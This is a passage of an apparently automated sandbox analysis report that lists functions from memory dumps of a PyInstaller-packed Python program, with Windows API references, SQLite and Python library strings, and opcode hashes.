                                                                                                                                                                                                                                              • API ID: Arg_$ArgumentCheckDigitErr_FromLongLong_PositionalStringUnicode_
                                                                                                                                                                                                                                              • String ID: a unicode character$argument 1$digit$not a digit
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Cannot add a UNIQUE column, xrefs: 00007FFDFABC796C
                                                                                                                                                                                                                                              • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDFABC79C7, 00007FFDFABC7A43, 00007FFDFABC7B51
                                                                                                                                                                                                                                              • Cannot add a column with non-constant default, xrefs: 00007FFDFABC7A39
                                                                                                                                                                                                                                              • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDFABC79DF
                                                                                                                                                                                                                                              • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDFABC7D2C
                                                                                                                                                                                                                                              • cannot add a STORED column, xrefs: 00007FFDFABC7B42
                                                                                                                                                                                                                                              • Cannot add a PRIMARY KEY column, xrefs: 00007FFDFABC7951
                                                                                                                                                                                                                                              • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDFABC79BD
                                                                                                                                                                                                                                              • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDFABC7BE4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                                              • Opcode ID: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                              • Instruction ID: ec2b8e359a38391f51e1e6cee61cea25bc9dbfaa70dcd20db93100e4be687e84
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B819D21F086438EFB6D9B659870A793690AF95780F5440B5EA2C437DEDE3CE84F8708
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction ID: a59d2eb9e0c1bfefa1bdff49e8a6065b577ecdf93e17dd52da3a8f57425589c3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE129471E0C26386FF205B14D95E67976A2FB50770F844136EE8987AC4DF3CE9A08B16
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction ID: e8a643046ec8364d39d7899dceab3667915c4dda962fd032ec5b0fb8bd0b14bc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94128462E0C14386FF245E14EC5A77976A1FB41774FE48135EA9A879C4DF7CE4A08B02
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: new[]
                                                                                                                                                                                                                                              • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                              • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                              • Opcode ID: 6620010e7044335df54d957efec44e4603a8576bb54a78712787ebc1850900a5
                                                                                                                                                                                                                                              • Instruction ID: 4ce3cb9919391c8ee8e9ee149e6401366382f7c6f953e83a54c58df1d7070f24
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6620010e7044335df54d957efec44e4603a8576bb54a78712787ebc1850900a5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36519411F0C6C745FB5D9B65A431EBA6791AF44BC8F8880B5D96D0B6CECE7CE4468300
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: 7353426b42f42a82694b3592670e666301d967352ad9965b6266ed7fbff1557c
                                                                                                                                                                                                                                              • Instruction ID: cfa4bf5834d1cb3063852b2fe82e2636f6180bf66d6db2846a27d932344d0acc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7353426b42f42a82694b3592670e666301d967352ad9965b6266ed7fbff1557c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7141C161B086528AFE00EB1AAC466B96390FF44FE0F444432ED0CC7796DF3DE9818346
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F8704
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F870A
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F874C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8830: GetEnvironmentVariableW.KERNEL32(00007FF62C0F388E), ref: 00007FF62C0F8867
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF62C0F8889
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C108238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C108251
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2810: MessageBoxW.USER32 ref: 00007FF62C0F28EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                                                              • API String ID: 2221118986-554953066
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: -$-Inf$0123456789ABCDEF0123456789abcdef$NaN$VUUU$gfff$null
                                                                                                                                                                                                                                              • API String ID: 2221118986-3207396689
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                              • API String ID: 3510742995-2846519077
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62C10F0AA,?,?,-00000018,00007FF62C10AD53,?,?,?,00007FF62C10AC4A,?,?,?,00007FF62C105F3E), ref: 00007FF62C10EE8C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62C10F0AA,?,?,-00000018,00007FF62C10AD53,?,?,?,00007FF62C10AC4A,?,?,?,00007FF62C105F3E), ref: 00007FF62C10EE98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2C9E
                                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2D63
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF62C0F2D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset$memmove
                                                                                                                                                                                                                                              • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                              • API String ID: 3094553269-1987291987
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 3510742995-3727861699
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                              • API String ID: 3510742995-1404302391
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                              • String ID: a unicode character$argument$category
                                                                                                                                                                                                                                              • API String ID: 1318908108-2068800536
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                              • String ID: a unicode character$argument$bidirectional
                                                                                                                                                                                                                                              • API String ID: 1318908108-2110215792
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD4D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD5B
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD85
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDDF3
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDDFF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF62C0F351A,?,00000000,00007FF62C0F3F1B), ref: 00007FF62C0F2AA0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction ID: f5b20213c2993350d6523f7d901f06bbbee1cccb359ffe2672accee5f38b1499
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B119321B18A4186EB508B5AFC5A32963A0FF99BF4F040234EA5DC7794DFBCE8148742
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _PyArg_CheckPositional.PYTHON312 ref: 00007FFDFAA536E7
                                                                                                                                                                                                                                              • _PyArg_BadArgument.PYTHON312 ref: 00007FFDFAA5371A
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAA511B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFDFAA511E2
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAA511B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFDFAA511FA
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAA511B0: PyType_IsSubtype.PYTHON312 ref: 00007FFDFAA5121D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_CompareStringUnicode_With$ArgumentCheckPositionalSubtypeType_
                                                                                                                                                                                                                                              • String ID: argument 1$argument 2$normalize$str
                                                                                                                                                                                                                                              • API String ID: 4101545800-1320425463
                                                                                                                                                                                                                                              • Opcode ID: 6a3206665d50624963465f038f79663c2d3d68664346081dad0779ef5a43a2b4
                                                                                                                                                                                                                                              • Instruction ID: f3783b419ef62b3d59ade9fc141c4047fbef046baa5f430d556878a47f02bd23
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a3206665d50624963465f038f79663c2d3d68664346081dad0779ef5a43a2b4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF118661F18A8688EB588B11E470EBA7760BF54FC4F8480B5D92D076DCCE2CD44EC754
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                              • String ID: argument 1$argument 2$is_normalized$str
                                                                                                                                                                                                                                              • API String ID: 3876575403-184702317
                                                                                                                                                                                                                                              • Opcode ID: 7c950a274d1c530a4e2b2ee5c75bc666441a244dd8d061769435580234d1272f
                                                                                                                                                                                                                                              • Instruction ID: fef90f4a78c521f0829b93eb2cd2a0af5d7b86c84d2bc5e5d107d9eb4c1b0e34
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c950a274d1c530a4e2b2ee5c75bc666441a244dd8d061769435580234d1272f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B018260F08A8699EB588B51E4A1FB53361AB14FC4F8490B1D92E072DCCE2CD48EC300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDFABD67FE
                                                                                                                                                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00007FFDFABD6AFE
